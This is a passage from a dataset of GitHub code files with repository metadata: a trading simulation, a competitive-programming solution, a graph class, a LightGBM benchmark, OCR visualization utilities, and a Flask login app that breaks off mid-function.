do we differentiate?\n remaining_purchases = len(ls_to_buy)\n portfolio_size = len(portfolio_dict.keys())\n cash = portfolio_dict['cash']\n try:\n cash_for_purchase = (cash / remaining_purchases)\n except:\n cash_for_purchase = 0\n\n while ((cash - transaction_fee) > 0) & (len(ls_to_buy)>0) & (portfolio_size > 0) & (portfolio_size < max_holdings):\n ticker = ls_to_buy.pop(0)\n\n if (ticker not in portfolio_dict.keys()) & (portfolio_size > 0) & ((cash_for_purchase - transaction_fee) > 0):\n portfolio_dict[ticker] = portfolio.make_an_empty_holding()\n portfolio_dict[ticker] = portfolio.purchase_shares(ticker, 'buy', cash_for_purchase, market_data, portfolio_dict[ticker])\n portfolio_dict['cash'] -= cash_for_purchase\n portfolio_size = portfolio.how_many_holdings_to_buy(portfolio_dict)\n cash = portfolio_dict['cash']\n portfolio_size = len(portfolio_dict.keys())\n \n return portfolio_dict\n\ndef run_sell_side (portfolio_dict, date, market_data):\n ls_to_sell = portfolio.candidates_for_sale(portfolio_dict, market_data, portfolio.threshold ) #based on what is in portfolio now\n action = 'sell'\n print(ls_to_sell)\n for holding in ls_to_sell:\n if holding == 'all holdings are down!':\n pass\n else:\n portfolio_dict = portfolio.sell_shares(holding, action, portfolio_dict, market_data)\n sell_side_complete = True\n return sell_side_complete, portfolio_dict\n\ndef total_value (portfolio_dict: dict())->float():\n tmp_value = float()\n for k, v in portfolio_dict.items():\n if k == 'cash':\n pass\n else:\n tmp_value += (portfolio_dict[k]['units'] * portfolio_dict[k]['current_price'])\n \n tmp_value = tmp_value + portfolio_dict['cash']\n return tmp_value\n\n\nif __name__ == \"__main__\":\n \n case_studies = {}\n total_transactions = []\n for sim in range(29):\n portfolio = Portfolio()\n portfolio_dict_raw = {}\n portfolio_dict_raw = portfolio.get_new_portfolio(raw_market_data.iloc[:2], specific_ls=[]).copy()\n print(f'here is the very beginning of dict: {portfolio_dict_raw}')\n portfolio_dict_buy_and_hold = copy.deepcopy(portfolio_dict_raw)\n portfolio_dict_buy_and_hold_final = assess_buy_and_hold(portfolio_dict_buy_and_hold, raw_market_data)\n final_value_buy_and_hold = total_value(portfolio_dict_buy_and_hold_final)\n output_portfolio = run_trading_simulation(time_window, portfolio_dict_raw, today, raw_market_data)\n final_value_buy_and_sell = total_value(output_portfolio)\n case_studies[sim] = {'buy_and_hold':[final_value_buy_and_hold, list(portfolio_dict_buy_and_hold_final.keys())], 'buy_and_sell': [final_value_buy_and_sell, list(output_portfolio.keys())]} #'buy_and_hold':final_value_buy_and_hold,\n total_transactions.append(portfolio.transaction_tracker)\n\n\n","repo_name":"andrewcmilne/stock_analyzer","sub_path":"src/trading_day.py","file_name":"trading_day.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13679790750","text":"from math import gcd\nimport sys\nsys.setrecursionlimit(1000000)\n\ndef main():\n N = int(input())\n A = list(map(int, input().split()))\n tmp = gcd(A[0],A[1])\n set_A = set(A)\n for i in range(2,N):\n tmp = gcd(tmp, A[i])\n\n if tmp != 1:\n print('not coprime')\n exit()\n max_A = max(A)\n ans = [False] * (max_A + 1)\n flag = True\n def divisor(n):\n ass = []\n for i in range(1,int(n**0.5)+1):\n if n%i == 0:\n ass.append(i)\n if ans[i]:\n return False\n if i != 1:\n ans[i] = True\n if i**2 == n:\n continue\n if ans[n//i]:\n return False\n ans[n//i] = True\n ass.append(n//i)\n if n != 1:\n ans[n] = True\n return True #sortされていない\n for a in A:\n if not divisor(a):\n flag = False\n break\n\n if flag:\n print('pairwise coprime')\n else:\n print('setwise coprime')\n \n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"tails1434/Atcoder","sub_path":"ABC/177/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73984560648","text":"import argparse\n\nparser = argparse.ArgumentParser(description=\"Run\")\nparser.add_argument('--runnable', '-m', type=str, default=\"chatbot\", help=\"The file to run.\")\n\nargs = parser.parse_args()\n\nif args.runnable == \"chatbot\":\n from runnable.chatbot import run_chatbot\n \n run_chatbot()\n \nelif args.runnable == \"endpoint\":\n from runnable.endpoint import run_model_endpoint\n \n run_model_endpoint()\n \nelif args.runnable == \"discord_index\":\n from runnable.discord_index import run_discord_index\n \n run_discord_index()\n \nelif args.runnable == \"querier\":\n from backend.querier import run_querier\n \n run_querier()\n \nelse :\n raise Exception(\"Invalid runnable.\")","repo_name":"Pangasius/llama-index-tests","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"26809306747","text":"import json\nfrom typing import Optional, Union\n\n\nclass AdjacencyListGraph:\n def __init__(self, is_directed: bool = False, is_weighted: bool = False) -> None:\n self.graph: dict[int, list[Union[int, list]]] = {}\n self.is_directed = is_directed\n self.is_weighted = is_weighted\n\n def __str__(self) -> str:\n return json.dumps(self.graph)\n\n def add_vertex(self, vertex: int) -> None:\n \"\"\"Insert a new Vertex.\"\"\"\n if vertex not in self.graph:\n self.graph[vertex] = []\n\n def add_edge(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Insert and return a new Edge from vertex_1 to vertex_2 with auxiliary element weight.\"\"\"\n for vertex in [vertex_1, vertex_2]:\n self.add_vertex(vertex)\n\n if self.is_edge_existed(vertex_1, vertex_2):\n return\n\n self.graph[vertex_1].append([vertex_2, weight] if self.is_weighted else vertex_2)\n if not self.is_directed:\n self.graph[vertex_2].append([vertex_1, weight] if self.is_weighted else vertex_1)\n\n def is_edge_existed(self, vertex_1: int, vertex_2: int) -> bool:\n \"\"\"Return the boolean value representing the connection between 2 vertices\"\"\"\n for adjacent_vertex in self.get_adjacent_vertices(vertex_1):\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex_2:\n return True\n return False\n\n def get_edge_weight(self, vertex_1: int, vertex_2: int) -> Optional[int]:\n \"\"\"Return the weight of the edge from vertex_1 to vertex_2, or None if not adjacent.\"\"\"\n if not self.is_weighted:\n return None\n\n for adjacent_vertex, weight in self.get_adjacent_vertices(vertex_1):\n if adjacent_vertex == vertex_2:\n return weight\n\n return None\n\n def set_edge_weight(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Set the weight of the edge from vertex_1 to vertex_2 if adjacent.\"\"\"\n if not self.is_weighted:\n return\n\n if not self.is_edge_existed(vertex_1, vertex_2):\n return\n\n for start_vertex, end_vertex in (\n [(vertex_1, vertex_2)] if self.is_directed else [(vertex_1, vertex_2), (vertex_2, vertex_1)]\n ):\n for adjacent_vertex in self.get_adjacent_vertices(start_vertex):\n if adjacent_vertex[0] == end_vertex:\n adjacent_vertex[1] = weight\n\n def vertex_count(self) -> int:\n \"\"\"Return the number of vertices in the graph.\"\"\"\n return len(self.graph.keys())\n\n def edge_count(self) -> int:\n \"\"\"Return the number of edges in the graph.\"\"\"\n total_edges = sum(len(adjacent_vertices) for adjacent_vertices in self.graph.values())\n return total_edges if self.is_directed else total_edges // 2\n\n def vertices(self) -> list[int]:\n \"\"\"Return a list of all vertices of the graph.\"\"\"\n return list(self.graph.keys())\n\n def edges(self) -> list[tuple]:\n \"\"\"Return a list of all edges of the graph.\"\"\"\n edges = []\n for vertex, adjacent_vertices in self.graph.items():\n for adjacent_vertex in adjacent_vertices:\n edges.append((vertex, *adjacent_vertex) if self.is_weighted else (vertex, adjacent_vertex))\n return edges\n\n def get_adjacent_vertices(self, vertex: int) -> list[Union[int, list]]:\n \"\"\"Return a list of all vertices connecting with the vertex.\"\"\"\n return self.graph.get(vertex, [])\n\n def in_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of incoming edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n in_degree_total = 0\n for vertex_value, adjacent_vertices in self.graph.items():\n if vertex_value == vertex:\n continue\n\n for adjacent_vertex in 
adjacent_vertices:\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex:\n in_degree_total += 1\n\n return in_degree_total\n\n def out_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of outgoing edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n return len(self.get_adjacent_vertices(vertex))\n\n def degree(self, vertex: int) -> int:\n \"\"\"Return number of incident edges to the vertex in the graph.\"\"\"\n if self.is_directed:\n return self.in_degree(vertex) + self.out_degree(vertex)\n\n return len(self.get_adjacent_vertices(vertex))\n\n\nif __name__ == \"__main__\":\n for is_directed, is_weighted in [(False, False), (True, False), (False, True), (True, True)]:\n graph = AdjacencyListGraph(is_weighted=is_weighted, is_directed=is_directed)\n graph.add_vertex(0)\n graph.add_vertex(1)\n graph.add_vertex(2)\n graph.add_edge(1, 2, 1)\n graph.add_edge(2, 3, 2)\n graph.add_edge(4, 3, 3)\n graph.add_edge(4, 5, 4)\n\n assert graph.is_edge_existed(0, 1) is False\n assert graph.is_edge_existed(1, 2) is True\n assert graph.is_edge_existed(2, 1) is False if is_directed else True\n\n assert graph.get_edge_weight(0, 1) is None\n assert graph.get_edge_weight(1, 2) == (1 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (1 if is_weighted and not is_directed else None)\n\n graph.set_edge_weight(1, 2, 5)\n assert graph.get_edge_weight(1, 2) == (5 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (5 if is_weighted and not is_directed else None)\n\n assert graph.vertex_count() == 6\n assert graph.edge_count() == 4\n assert graph.vertices() == [0, 1, 2, 3, 4, 5]\n\n assert graph.in_degree(2) == (1 if is_directed else None)\n assert graph.out_degree(2) == (1 if is_directed else None)\n assert graph.degree(2) == 2\n\n if not is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 1),\n (2, 3),\n (3, 2),\n (3, 4),\n (4, 3),\n (4, 5),\n (5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [1, 3]\n elif is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 3),\n (4, 3),\n (4, 5),\n ]\n assert graph.get_adjacent_vertices(2) == [3]\n elif not is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 1, 5),\n (2, 3, 2),\n (3, 2, 2),\n (3, 4, 3),\n (4, 3, 3),\n (4, 5, 4),\n (5, 4, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[1, 5], [3, 2]]\n elif is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 3, 2),\n (4, 3, 3),\n (4, 5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[3, 2]]\n","repo_name":"duongleh/data-structures-and-algorithms","sub_path":"Graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20788061765","text":"import dataclasses\nimport gemmi\nfrom ..job import Job\nfrom ..reflections import DataItem, write_mtz\nfrom ..structure import read_structure, write_mmcif\n\n\n@dataclasses.dataclass\nclass SheetbendResult:\n structure: gemmi.Structure\n seconds: float\n\n\nclass Sheetbend(Job):\n def __init__(\n self,\n structure: gemmi.Structure,\n fsigf: DataItem,\n freer: DataItem = None,\n regularise: bool = False,\n ):\n super().__init__(\"csheetbend\")\n self.structure = structure\n self.fsigf = fsigf\n self.freer = freer\n self.regularise = regularise\n\n def _setup(self) -> None:\n write_mmcif(self._path(\"xyzin.cif\"), self.structure)\n write_mtz(self._path(\"hklin.mtz\"), [self.fsigf, self.freer])\n self._args += [\"-mtzin\", \"hklin.mtz\"]\n self._args += [\"-colin-fo\", self.fsigf.label()]\n if self.freer is not None:\n self._args += [\"-colin-free\", self.freer.label()]\n self._args += [\"-pdbin\", \"xyzin.cif\"]\n self._args += [\"-pdbout\", \"xyzout.cif\"]\n self._args += [\"-cycles\", \"12\"]\n self._args += [\"-resolution-by-cycle\", \"6,3\"]\n if self.regularise:\n self._args += [\"-postrefine-u-iso\"]\n self._args += [\"-pseudo-regularize\"]\n self._args += [\"-refine-regularize-cycles\", \"3\"]\n\n def _result(self) -> SheetbendResult:\n self._check_files_exist(\"xyzout.cif\")\n return SheetbendResult(\n structure=read_structure(self._path(\"xyzout.cif\")),\n seconds=self._seconds,\n )\n","repo_name":"paulsbond/modelcraft","sub_path":"modelcraft/jobs/sheetbend.py","file_name":"sheetbend.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16843222590","text":"import time \nimport lightgbm as lgb \nimport argparse \nfrom sklearn.datasets import make_classification \nfrom sklearn.model_selection import train_test_split \n \n \ndef benchmark_lightgbm(n_rows=100000, n_cols=20, n_classes=2, verbose=True): \n # Generate a random n-class classification problem \n if verbose: \n print(f\"Generating dataset with {n_rows} samples, {n_cols} features...\") \n X, y = make_classification( \n n_samples=n_rows * 2, n_features=n_cols, n_classes=n_classes \n ) \n X_train, X_test, y_train, y_test = train_test_split( \n X, y, random_state=42, test_size=0.5 \n ) \n \n # Define parameters for the LightGBM classifier \n param = { \n \"objective\": \"multiclass\", \n \"num_class\": n_classes, \n \"metric\": \"multi_logloss\", \n \"verbosity\": -1, \n } \n num_round = 20 # the number of training iterations \n \n # Train the model and measure the time it takes \n if verbose: \n print(\"Training model...\") \n start_time = time.time() \n bst = lgb.train(param, lgb.Dataset(X_train, label=y_train), num_round) \n end_time = time.time() \n \n # Measure the time it takes to make predictions \n if verbose: \n print(\"Making predictions...\") \n start_time_pred = time.time() \n predictions = bst.predict(X_test) \n end_time_pred = time.time() \n \n # Return the time it took to train the model and to make predictions \n train_time = end_time - start_time \n pred_time = end_time_pred - start_time_pred \n if verbose: \n print(f\"Training time: {train_time} seconds\") \n print(f\"Prediction time: {pred_time} seconds\") \n results = {\"train_time\": train_time, \"pred_time\": pred_time} \n return results \n \n \nif __name__ == \"__main__\": \n parser = argparse.ArgumentParser() \n parser.add_argument( \n \"--rows\", type=int, default=100000, help=\"Number of rows in the dataset\" \n ) \n parser.add_argument( \n \"--cols\", type=int, default=20, help=\"Number of columns in the dataset\" \n ) \n args = parser.parse_args() \n \n benchmark_lightgbm(n_rows=args.rows, n_cols=args.cols) \n","repo_name":"detrin/datasci-benchmark","sub_path":"lightgbm_benchmark.py","file_name":"lightgbm_benchmark.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41183375545","text":"import torch\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport cv2\nimport math\nimport random\nimport numpy as np\n\n_tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120), \n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150), \n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148), \n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199), \n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)] \n \n# Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts. \nfor i in range(len(_tableau20)): \n r, g, b = _tableau20[i] \n _tableau20[i] = (r / 255., g / 255., b / 255.) \n\n\n\ndef _setup_image(model_input, batch_id=None):\n # Handle torch Variable instances\n if batch_id is None:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data\n else:\n img = model_input\n else:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data[batch_id]\n else:\n img = model_input[batch_id]\n\n # Copy to CPU if needed\n if isinstance(img, torch.cuda.FloatTensor):\n img = img.cpu()\n\n # NumPy-ify and change from CHW to HWC\n img = img.numpy().transpose( (1,2,0) )\n\n # Undo image normalization\n img = img*(-255)+255\n\n if img.shape[2] == 1:\n # matplotlib plots grayscale images correctly only if you get rid of channel dimension\n img = img[:,:,0]\n cmap = plt.cm.gray\n else:\n # OpenCV images are BGR whereas matplotlib assumes RGB\n img = cv2.convertColor(img, cv.COLOR_BGR2RGB)\n cmap = None # fallback to default\n\n return img, cmap \n\n\ndef _form_display_char(idx, alphabet):\n # Special case for CTC Blank\n if idx == 0:\n return '_'\n\n # Special case for space so it shows up\n if alphabet[idx] == 'u0020':\n return '[SP]'\n \n # Otherwise, just convert to utf-8\n return chr(int(alphabet[idx][1:], 16))\n\ndef _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id=None):\n # Actual model output is not set to probability vector yet, need to run softmax\n probs = torch.nn.functional.softmax(model_output.view(-1, model_output.size(2))).view(model_output.size(0), model_output.size(1), -1)\n\n if batch_id is None:\n batch_id = 0\n\n # Handle torch Variable instances\n if isinstance(probs, torch.autograd.Variable):\n probs = probs.data[:,batch_id,:]\n else:\n probs = probs[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = probs.cpu()\n\n # Squeeze away unused dimension\n probs.squeeze_()\n\n # Now let's cycle through frames and check for low confidence regions\n low_confidence_spans = []\n topk = 5\n for t in range(probs.size(0)):\n topk_vals, topk_idxs = torch.topk(probs[t], topk)\n if topk_vals[0] < conf_thresh:\n options = []\n for i in range(topk):\n char = _form_display_char(topk_idxs[i], alphabet)\n options.append( (char, topk_vals[i], topk_idxs[i] ) )\n tot_conf = 0\n for _, prob, _ in options:\n tot_conf += prob\n\n if tot_conf >= conf_thresh:\n break\n\n low_confidence_spans.append( (t, t, options) )\n\n\n return low_confidence_spans\n\ndef _decode_with_alignment_spans(model_output, alphabet, batch_id=None):\n min_prob_thresh = 3* 1/len(alphabet)\n\n if batch_id is None:\n batch_id = 0\n # Handle torch Variable instances\n if isinstance(model_output, torch.autograd.Variable):\n probs = model_output.data[:,batch_id,:]\n else:\n probs = model_output[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = 
probs.cpu()\n\n # Now time to decode\n argmaxs, argmax_idxs = probs.max(dim=1)\n argmax_idxs.squeeze_()\n argmaxs.squeeze_()\n prev_max = None\n span_start = 0\n\n alignment_tuples = []\n for t in range(probs.size(0)):\n cur_max_prob = argmaxs[t]\n cur_max = argmax_idxs[t]\n\n # Heuristic\n # If model is predicting very low probability for all letters in alphabet, treat that the\n # samed as a CTC blank\n if cur_max_prob < min_prob_thresh:\n cur_max = 0\n\n if prev_max is None:\n prev_max = cur_max\n continue\n if prev_max != cur_max:\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, t, char, prev_max) )\n span_start = t+1\n prev_max = cur_max\n\n # Handle last leftover if nescesary\n if span_start != probs.size(0):\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, probs.size(0)-1, char, prev_max) )\n\n return alignment_tuples\n\n\n\ndef display_target(target, alphabet):\n string_utf8 = \"\"\n string_uxxxx = \"\"\n for char_idx in target:\n string_uxxxx += alphabet[char_idx] + ' '\n string_utf8 += chr(int(alphabet[char_idx][1:], 16))\n\n print(\"Target utf8 string is [%s]\" % string_utf8)\n\n # For Arabic, it is sometimes helpful to dipslay the uxxxx output\n# if not alphabet.left_to_right:\n# print(\"Target uxxxx string is: \\n\\t%s\" % string_uxxxx)\n\ndef display_image(model_input, batch_id=None):\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef overlay_hidden_activations(model_input, hidden, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n\n # (1) Setup raw plot of hidden activations overlayed on image\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Now simply plot hidden activations in image\n if isinstance(hidden, torch.autograd.Variable) or isinstance(hidden, torch.FloatTensor):\n hidden = hidden.cpu().numpy()\n\n ax2 = ax.twinx()\n hidden_xs = range(hidden.shape[0])\n hidden_xs = [x*scale_factor for x in hidden_xs]\n ax2.plot(hidden_xs, hidden)\n ax2.set_ylim(-1,1)\n ax2.set_yticks([])\n ax2.set_xticks([])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n # (2) Setup color-coded background overlay\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n for t in range(hidden.shape[0]):\n left_x = scale_factor*t - left_correction\n right_x = 
scale_factor*(t+1) + right_correction\n \n #seismic or bwr\n ax.axvspan(left_x, right_x, color=plt.cm.seismic( (hidden[t]+1)/2 ), alpha=0.5)\n\n\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\n\ndef overlay_alignment(model_input, model_output, alphabet, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Now handle argmax decoding\n alignment_tuples = _decode_with_alignment_spans(model_output, alphabet, batch_id)\n\n # Now color-code spans\n for span_start, span_end, span_char, span_char_id in alignment_tuples: \n letter_color = _tableau20[span_char_id % len(_tableau20)]\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=letter_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_y = -10\n rotation = 0\n label_x_correction = 0\n if span_char == \"[SP]\":\n rotation = 90\n label_x_correction = -2\n label_y = -20\n\n ax.annotate(span_char, (label_x,0), (label_x + label_x_correction, label_y), arrowprops={'arrowstyle': '->'}, xycoords='data', textcoords='data', rotation=rotation)\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef display_low_confidence_regions(model_input, model_output, alphabet, scale_factor=(1.0/0.49), conf_thresh=0.99, batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n ax.set_yticks([])\n ax.set_xticks([])\n\n # Now handle argmax decoding\n spans = _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id)\n\n low_conf_area = 0\n low_conf_area_v2 = 0\n\n # Use these to remember the number of characters we showed previuosly, to properly position current labels\n # Even-numbered spans are above the image and odd-numbered spans are below, so keep track of both seperately\n prev_len_even = 2\n prev_len_odd = 2\n\n # Now color-code spans\n for span_idx, (span_start, span_end, char_array) in enumerate(spans): \n low_conf_area += (span_end - span_start + 1)\n\n # Want to count perent of area where confusion is between more than one character in the model,\n # Not just between CTC-Blank and a character in the model\n if len(char_array) > 2 or (len(char_array) == 2 and (char_array[0][2] != 0 and char_array[1][2] != 0)):\n low_conf_area_v2 += (span_end - span_start + 1)\n\n span_color = _tableau20[random.randint(0, len(_tableau20)-1)]\n\n # 
Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=span_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_x_correction = -8\n\n delta = 10\n if span_idx % 2 == 0:\n delta_y = -delta\n arrow_y = 5\n\n if span_idx % 4 == 0:\n label_y = -delta\n else:\n label_y = -delta + prev_len_even * delta_y \n\n\n prev_len_even = len(char_array)\n else:\n delta_y = delta\n arrow_y = img.shape[0] - delta\n\n if span_idx % 4 == 1:\n label_y = img.shape[0] + delta\n else:\n label_y = delta + prev_len_odd * delta_y + img.shape[0]\n\n prev_len_odd = len(char_array)\n char_array = list(reversed(char_array))\n\n for i, (char, prob, char_idx) in enumerate(char_array):\n if i == len(char_array)-1:\n ax.annotate(\"%s (%d)\" % (char,int(100*prob)), (label_x,arrow_y), (label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1))), arrowprops={'arrowstyle': '->', 'alpha': 0.2}, xycoords='data', textcoords='data', color=span_color)\n else:\n ax.text(label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1)), \"%s (%d)\" % (char,int(100*prob)), color=span_color)\n\n\n\n # Finally, show image\n print(\"Percentage of frames having confidence < %.2f is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area/model_output.size(0)))\n print(\"Percentage of frames having confidence < %.2f with confusion b/w more than CTC blank is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area_v2/model_output.size(0)))\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n","repo_name":"isi-vista/VistaOCR","sub_path":"src/utils/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":13794,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"16"}
+{"seq_id":"10470704141","text":"from flask import Flask, jsonify, request, make_response, render_template\nfrom flask import render_template, redirect, url_for, flash\nfrom flask_login import UserMixin, LoginManager\nfrom flask_login import login_user, login_required, current_user, logout_user\nfrom flask_login import login_required, current_user # After login - Profile\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_socketio import SocketIO, send, emit\nfrom flask_cors import CORS\n\n\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nfrom datetime import datetime\n\napp = Flask(__name__)\nCORS(app)\napp.config['SECRET_KEY'] = 'secret-key-goes-here'\nsocketio = SocketIO(app)\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///AirCADia_Nebos.db'\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login'\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(user_id):\n # since the user_id is just the primary key of our user table, use it in the query for the user\n return User.query.get(int(user_id))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/aircadia_nebos')\n@login_required\ndef aircadia_nebos():\n return render_template('AircadiaNebos/AirCADiaNebos.html')\n\n@app.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', name=current_user.name)\n\n\n@app.route('/aircadia')\ndef aaa():\n return \"Hello, AirCADia!\"\n\n\n@app.route('/signup')\ndef signup():\n return render_template('signup.html')\n\n@app.route('/signup', methods=['POST'])\ndef signup_post():\n # code to validate and add user to database goes here\n email = request.form.get('email')\n username = request.form.get('email')\n name = request.form.get('name')\n password = request.form.get('password')\n\n user = User.query.filter_by(email=email).first() # if this returns a user, then the email already exists in database\n\n if user: # if a user is found, we want to redirect back to signup page so user can try again\n flash('Email address already exists')\n return redirect(url_for('signup'))\n\n # create a new user with the form data. 
Hash the password so the plaintext version isn't saved.\n new_user = User(name=name, email=email, username=username, password=generate_password_hash(password, method='sha256'))\n\n # add the new user to the database\n db.session.add(new_user)\n db.session.commit()\n return redirect(url_for('login'))\n\n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n@app.route('/login', methods=['POST'])\ndef login_post():\n # login code goes here\n email = request.form.get('email')\n password = request.form.get('password')\n remember = True if request.form.get('remember') else False\n\n user = User.query.filter_by(email=email).first()\n\n # check if the user actually exists\n # take the user-supplied password, hash it, and compare it to the hashed password in the database\n if not user or not check_password_hash(user.password, password):\n flash('Please check your login details and try again.')\n return redirect(url_for('login')) # if the user doesn't exist or password is wrong, reload the page\n\n # if the above check passes, then we know the user has the right credentials\n login_user(user, remember=remember)\n return redirect(url_for('profile'))\n\n\n\n\n\n@app.route('/logout')\ndef logout():\n logout_user()\n return 'Logout'\n\n\n\n\n\n@app.route('/get-projects', methods=[\"GET\"])\ndef get_projects():\n projectsJson = []\n # projects\n projects = Project.query.all()\n for project in projects:\n 